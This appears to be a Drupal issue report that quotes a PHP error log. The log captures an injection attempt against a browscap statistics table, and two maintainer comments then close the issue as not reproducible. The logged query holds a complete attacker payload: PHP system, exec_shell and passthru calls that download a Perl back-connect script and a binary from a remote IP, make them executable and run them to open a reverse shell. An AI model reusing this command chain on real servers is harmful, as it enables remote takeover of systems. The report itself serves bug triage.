[22-Jun-2010 23:47:15] PHP Warning: Duplicate entry '<?system('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.' for key 1
query: INSERT INTO browscap_statistics (parent,counter,is_crawler) VALUES('<?system(\'cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80\');?> ;<?exec_shell(\'cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80\');?> ;<?passthru(\'cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/ in /home/xxxxxxxx/public_html/includes/database.mysql.inc on line 128

Comments

greggles’s picture

greggles
he/him
Primary language English
Location Denver, Colorado, USA
commented

This looks like an attempt at an injection, but it's not clear that it is successful.

Can you clarify whether or not this was executed?

greggles’s picture

greggles
he/him
Primary language English
Location Denver, Colorado, USA
commented
Status: Active » Closed (cannot reproduce)

Seems like there is no way to actually exploit this and this is just an error.